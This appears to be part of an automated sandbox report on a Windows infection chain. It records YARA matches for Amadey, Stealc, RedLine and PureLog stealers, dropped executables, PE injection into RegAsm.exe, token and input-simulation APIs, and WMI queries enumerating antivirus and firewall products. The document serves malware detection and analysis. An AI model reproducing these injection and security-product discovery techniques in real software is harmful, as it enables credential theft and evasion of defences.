Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C9008
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 17_2_00E51201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 17_2_00E32BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5B226 SendInput,keybd_event, 17_2_00E5B226
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 17_2_00E722DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 17_2_00E50B62
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 17_2_00E51663
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000001E.00000002.2132470918.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000029.00000002.2741698869.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: BProgram Manager
Source: 6dbb7bdf47.exe Binary or memory string: Shell_TrayWnd
Source: 3ec4738210.exe, 3ec4738210.exe, 0000000D.00000002.1975346461.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, b74664dd7e.exe, 0000000E.00000002.2584529637.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, b74664dd7e.exe, 0000001D.00000002.2791005796.0000000000928000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 9Program Manager
Source: skotes.exe, skotes.exe, 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: .vProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DCD3E2 cpuid 11_2_00DCD3E2
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000015002\b74664dd7e.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000015002\b74664dd7e.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000018042\blo.ps1 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000285001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000308001\4d72d15151.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000321001\2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\1000015002\b74664dd7e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DCCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 11_2_00DCCBEA
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E4D27A GetUserNameW, 17_2_00E4D27A
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 17_2_00E2B952
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: gold.exe, 0000001F.00000002.2096763513.0000000000A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3771028122.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 0000001F.00000002.2096763513.0000000000A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 28.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.610cd559ac.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.skotes.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.skotes.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.file.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1352623579.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2089661467.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1277581266.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3749392978.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1987821507.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2132345556.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.1945297773.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1312296599.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1925680641.00000000000E1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.2690915985.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1452499164.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2741378839.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.1946658901.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.1885515437.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 31.2.gold.exe.3775570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.gold.exe.3775570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gold.exe PID: 4516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
Yara detected Stealc
Source: Yara match File source: 15.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2669801518.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352900147.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2350817392.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2586371888.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1644238090.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1976198696.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1756168232.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
